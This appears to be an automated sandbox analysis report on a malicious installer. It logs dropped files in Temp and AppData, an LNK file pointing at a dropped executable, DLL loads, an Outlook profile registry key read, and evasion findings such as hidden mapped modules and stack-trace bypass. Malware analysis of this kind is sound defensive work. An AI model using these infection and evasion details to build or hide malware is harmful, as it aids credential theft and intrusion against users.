Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32

Jump to behavior

Source: tlwqrc.5.dr

LNK file: ..\..\Roaming\MonitorBrowser2\ActiveISO.exe

Source: C:\Windows\SysWOW64\cmd.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: BkTwXj17DH.exe

Static file information: File size 14489740 > 1048576

Source: BkTwXj17DH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: BkTwXj17DH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: BkTwXj17DH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: BkTwXj17DH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: BkTwXj17DH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: BkTwXj17DH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: BkTwXj17DH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: BkTwXj17DH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: BkTwXj17DH.exe, 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmp, BkTwXj17DH.exe, 00000000.00000000.1415495894.000000000050B000.00000002.00000001.01000000.00000003.sdmp, BkTwXj17DH.exe, 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmp, BkTwXj17DH.exe, 00000002.00000000.1420259549.0000000000D9B000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\sharefolders.pdb' source: BkTwXj17DH.exe, 00000002.00000002.1473759971.000000007000A000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5PrintSupport.pdb33 source: ActiveISO.exe, 00000003.00000002.1468035111.00007FFBAB070000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1534561084.00007FFBAA2A0000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: ActiveISO.exe, 00000003.00000002.1463442325.00007FFBA9C7C000.00000002.00000001.01000000.0000000C.sdmp, ActiveISO.exe, 00000004.00000002.1531943131.00007FFBA869C000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: ActiveISO.exe, 00000003.00000002.1469772172.00007FFBC3135000.00000002.00000001.01000000.0000000F.sdmp, ActiveISO.exe, 00000003.00000002.1456960505.000001918B2DA000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1535027214.00007FFBBC9F5000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: ntdll.pdb source: ActiveISO.exe, 00000003.00000002.1462470445.000001918E740000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000002.1462216320.000001918E345000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1530200810.000001B256293000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1529317938.000001B255C97000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1529694254.000001B256090000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2009396599.00000000043B5000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008251395.00000000039B1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2012194200.00000000055B6000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008941462.0000000003FB2000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2010789316.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2007277559.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2009614238.00000000045B0000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2016220829.0000000006BB7000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008693611.0000000003DB9000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2010487344.0000000004BB1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2012805216.00000000059B6000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2013670109.0000000005DBE000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2014130874.0000000005FB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Network.pdb source: ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 00000004.00000002.1532542754.00007FFBA88AA000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.1732196243.0000000004996000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732831266.0000000005270000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: ActiveISO.exe, 00000003.00000002.1462470445.000001918E740000.00000004.00000800.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000002.1462216320.000001918E345000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1530200810.000001B256293000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1529317938.000001B255C97000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1529694254.000001B256090000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2009396599.00000000043B5000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008251395.00000000039B1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2012194200.00000000055B6000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008941462.0000000003FB2000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2010789316.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2007277559.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2009614238.00000000045B0000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2016220829.0000000006BB7000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2008693611.0000000003DB9000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2010487344.0000000004BB1000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2012805216.00000000059B6000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2013670109.0000000005DBE000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2014130874.0000000005FB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: ActiveISO.exe, 00000003.00000002.1466012295.00007FFBAA858000.00000002.00000001.01000000.00000010.sdmp, ActiveISO.exe, 00000004.00000002.1533059618.00007FFBA8CB8000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: wntdll.pdb source: cmd.exe, 00000005.00000002.1732196243.0000000004996000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732831266.0000000005270000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: ActiveISO.exe, 00000003.00000002.1464563770.00007FFBAA336000.00000002.00000001.01000000.0000000D.sdmp, ActiveISO.exe, 00000003.00000003.1449494448.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1531483502.00007FFBA81A6000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5PrintSupport.pdb source: ActiveISO.exe, 00000003.00000002.1468035111.00007FFBAB070000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1534561084.00007FFBAA2A0000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: ActiveISO.exe, 00000003.00000002.1469464951.00007FFBBBDA1000.00000002.00000001.01000000.0000000E.sdmp, ActiveISO.exe, 00000003.00000003.1454101928.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1534844762.00007FFBBB3E1000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: ActiveISO.exe, 00000003.00000002.1467038697.00007FFBAAE41000.00000002.00000001.01000000.0000000A.sdmp, ActiveISO.exe, 00000004.00000002.1533860035.00007FFBA92A1000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\sharefolders.pdb source: BkTwXj17DH.exe, 00000002.00000002.1473759971.000000007000A000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Debug\amd64\StarBurn.pdb source: ActiveISO.exe, 00000003.00000002.1468524264.00007FFBAB641000.00000020.00000001.01000000.00000008.sdmp, ActiveISO.exe, 00000004.00000002.1534211751.00007FFBA94B1000.00000020.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbF source: ActiveISO.exe, 00000003.00000002.1463442325.00007FFBA9C7C000.00000002.00000001.01000000.0000000C.sdmp, ActiveISO.exe, 00000004.00000002.1531943131.00007FFBA869C000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Debug\amd64\StarBurn.pdbH source: ActiveISO.exe, 00000003.00000002.1468524264.00007FFBAB641000.00000020.00000001.01000000.00000008.sdmp, ActiveISO.exe, 00000004.00000002.1534211751.00007FFBA94B1000.00000020.00000001.01000000.00000013.sdmp

Source: BkTwXj17DH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: BkTwXj17DH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: BkTwXj17DH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: BkTwXj17DH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: BkTwXj17DH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: vcruntime140.dll.2.dr

Static PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]

Source: xsnxlhd.5.dr	Static PE information: real checksum: 0x283615 should be: 0x281c6d
Source: dykhaneiil.19.dr	Static PE information: real checksum: 0x283615 should be: 0x281c6d
Source: Helicoid.dll.2.dr	Static PE information: real checksum: 0x3a1eb should be: 0x36b2f
Source: Qt5Core.dll.3.dr	Static PE information: real checksum: 0x5e2d16 should be: 0x5e3f3b
Source: Qt5Core.dll.2.dr	Static PE information: real checksum: 0x5e2d16 should be: 0x5e3f3b

Source: BkTwXj17DH.exe	Static PE information: section name: .wixburn
Source: BkTwXj17DH.exe.0.dr	Static PE information: section name: .wixburn
Source: vcruntime140.dll.2.dr	Static PE information: section name: _RDATA
Source: vcruntime140.dll.3.dr	Static PE information: section name: _RDATA
Source: UploadAlt_Ti.exe.5.dr	Static PE information: section name: Shared
Source: xsnxlhd.5.dr	Static PE information: section name: .xdata
Source: xsnxlhd.5.dr	Static PE information: section name: ufeo
Source: dykhaneiil.19.dr	Static PE information: section name: .xdata
Source: dykhaneiil.19.dr	Static PE information: section name: ufeo

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004EEAD6 push ecx; ret	0_2_004EEAE9
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D7EAD6 push ecx; ret	2_2_00D7EAE9
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_6FFF71D4 push ecx; ret	2_2_6FFF71E6
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA31D83A push rdx; retf	3_2_00007FFBAA31D83B
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA818D83A push rdx; retf	4_2_00007FFBA818D83B

Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Gui.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5PrintSupport.dll	Jump to dropped file
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\MonitorBrowser2\msvcp140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\dykhaneiil	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\vcruntime140_1.dll	Jump to dropped file
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Widgets.dll	Jump to dropped file
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Core.dll	Jump to dropped file
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Network.dll	Jump to dropped file
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\MonitorBrowser2\StarBurn.dll	Jump to dropped file
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	File created: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\xsnxlhd	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Helicoid.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Gui.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Widgets.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Core.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Network.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\StarBurn.dll	Jump to dropped file
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Jump to dropped file
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\MonitorBrowser2\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5PrintSupport.dll	Jump to dropped file
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	File created: C:\Users\user\AppData\Roaming\MonitorBrowser2\vcruntime140_1.dll	Jump to dropped file

Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Helicoid.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Gui.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Widgets.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Core.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Network.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\StarBurn.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\vcruntime140_1.dll	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	File created: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5PrintSupport.dll	Jump to dropped file
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	File created: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\xsnxlhd			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\dykhaneiil			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\XSNXLHD
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DYKHANEIIL

Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe

Code function: 2_2_6FFF601A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_6FFF601A

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\cmd.exe

API/Special instruction interceptor: Address: 6CDF3B54

Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: GetAdaptersInfo,_strlwr,strstr,free,	3_2_00007FF72A93BFF0
